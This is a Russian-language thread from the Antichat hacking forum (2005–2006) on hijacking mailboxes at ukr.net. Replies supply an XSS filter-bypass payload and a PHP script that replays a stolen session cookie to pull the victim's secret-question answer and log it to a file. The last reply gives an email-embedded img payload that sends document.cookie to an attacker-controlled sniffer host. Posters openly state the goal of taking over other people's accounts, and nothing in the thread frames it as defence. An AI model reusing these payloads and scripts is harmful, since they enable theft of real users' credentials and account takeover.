Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
02.12.2005, 00:19
|
|
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
Провел на форуме:
1050637
Репутация:
27
|
|
ukr.net как?
www.ukr.net
Считываем ответ на секретный вопрос
Код:
<embed src=javasc
но как? и куда его пихать, расжите плиз, очень надо! =)
|
|
|
02.12.2005, 04:20
|
|
ВАША реклама ТУТ!!
Регистрация: 01.07.2005
Сообщений: 647
Провел на форуме:
3478464
Репутация:
714
|
|
ВЫКЛАДЫВАЙТЕ СРАЗУ ТЕСТОВЫЕ ЛОГИН/ПАРОЛЬ!
Регистрация нового ящика доступна только с территории Украины.
То что ты выложил - по всей видимости кусок Xss. Почему не до конца? Конкретнее без доступа к ящику сказать трудно, а работать на диал апе через украинские прокси мне не в прикол.
__________________
My ICQ: 296@463@859 ONLY!! Please check your list!!
И здесь могла бы быть ВАША реклама!!!
Последний раз редактировалось Dronga; 02.12.2005 в 04:23..
|
|
|
|
02.12.2005, 16:35
|
|
Постоянный
Регистрация: 22.08.2005
Сообщений: 540
Провел на форуме:
4372175
Репутация:
1221
|
|
|
|
|
|
02.12.2005, 17:16
|
|
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
Провел на форуме:
1050637
Репутация:
27
|
|
|
|
|
|
02.12.2005, 17:45
|
|
Постоянный
Регистрация: 21.09.2005
Сообщений: 525
Провел на форуме:
2994394
Репутация:
547
|
|
Сообщение от Grema
www.ukr.net
Считываем ответ на секретный вопрос
Код:
<embed src=javasc
но как? и куда его пихать, расжите плиз, очень надо! =)
Дружище...Если ты его там взял то по ходу и прочитать должен был все...
Там все доходчиво описано...
Читай еще и еще и еще раз.
Пока не поймешь.
|
|
|
|
Взлом ящика на http://www.ukr.net/ |
03.12.2005, 15:54
|
|
ВАША реклама ТУТ!!
Регистрация: 01.07.2005
Сообщений: 647
Провел на форуме:
3478464
Репутация:
714
|
|
Взлом ящика на http://www.ukr.net/
Спасибо NeMiNeM за тестовые логин/пароль, надеюсь автор темы не забудет повысить ему репутацию.
Теперь по делу.
На исследования ушло ровным счетом 7 минут. Диагноз:
Фильтр чем-то напоминает тот, что чтоит на mail.ru (ранние версии). Пропускает закодированное javascript в левых тегах. Обходящая конструкция очень стандартна. Вот рабочий пример:
Код:
<img src=javascript:alert('ANTICHAT.RU');>
(javascript в ASCII)
В общем, полноценная активная xss в теле письма найдена.
Половина дела есть. Теперь смотрим что используется для авторизации. Сервер дал мне куки. В настройках я увидел отключенную опцию на запрет паралельных сессий, то есть на IP сервер по умолчанию не смотрит.
В дополнение ко всему мною были отмечены следущие особенности:
В настройках, в некоторых интересных местах не запрашивается пароль на сохранение изменений. Выводы делайте сами. На страничке Личная информация для antichat@ukr.net секретный вопрос и ответ на него не закрыты звездочками (!), то есть ящик элементарно "угоняется".
В общем, простор для творчества очень широкий.
Я бы тебе всё с удовольствием расписал от и до, но к сожалению в инете у меня осталось времени 8 минут. И те я трачу на тебя.. 
Кстати, приведенный тобой код, тоже по идее должен работать (если только embed не фильтруется).
Актуально под IE6 и Opera 8.51 (Другие не пробовал)
__________________
My ICQ: 296@463@859 ONLY!! Please check your list!!
И здесь могла бы быть ВАША реклама!!!
Последний раз редактировалось Dronga; 03.12.2005 в 16:17..
|
|
|
|
28.12.2005, 15:21
|
|
Новичок
Регистрация: 25.09.2005
Сообщений: 29
Провел на форуме:
104355
Репутация:
9
|
|
ну а если нужно захватить канал на irc а чел в ящик незаглядует уже более года ??? что делать??
|
|
|
|
05.01.2006, 02:51
|
|
[ розовый мафиозо ]
Регистрация: 16.03.2005
Сообщений: 301
Провел на форуме:
1736355
Репутация:
241
|
|
Захват ящика на ukr.net
Гы, у мну даж стать хде-то на винте статья пылится по данной теме....Дело это было еще в начале декабря, не знаю как сейчас, может уже и парсится.
PHP код:
<?
$query=$_SERVER["QUERY_STRING"];
$query=urldecode($query);
$header="GET http://e.ukr.net/cgi-bin/userinfo HTTP/1.0\r\n";
$header.="Referer: http://e.ukr.net\r\n";
$header.="Cookie: ".$query."\r\n";
$header.="Host: e.ukr.net\r\n\r\n";
$fp=fsockopen("e.ukr.net", 80);
fwrite($fp, $header);
$dt="";
while (!feof($fp))
$dt.=fread($fp, 1024);
$pass1=strpos($dt,'Password_Answer')+24;
$pass2=strpos($dt,'" size="40"><br><br></td>');
$length_pass=$pass2-$pass1;
$password=substr($dt,$pass1,$length_pass);
$f1=Fopen("password.html","a");
fwrite($f1,"$password<br /><hr>");
fclose($f1);
fclose($fp);
?>
Так же, если при авторизации поставить галочку "Помнить пароль", то можно использовать и обічній сниффер, ибо нам в лог упадет пароль в чистом виде. |
|
|
|
06.01.2006, 12:20
|
|
Новичок
Регистрация: 19.12.2005
Сообщений: 3
Провел на форуме:
27861
Репутация:
0
|
|
обясните плиз нешарящему, куда энто дело пихать?
|
|
|
|
06.01.2006, 13:44
|
|
[ радиоверсия ]
Регистрация: 12.07.2005
Сообщений: 946
Провел на форуме:
7544767
Репутация:
1060
|
|
Сообщение от ZiM
обясните плиз нешарящему, куда энто дело пихать?
это посылаешь на мыло в письме жертве
Код:
<img src="http://privatesniff/1.gif"style="background:white url(javascript:document.images[0].src='http:// privatesniff/s.php?'+document.cookie)">
а код php сюда
_http:// privatesniff/s.php сюда
__________________
ICQ 9731923
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
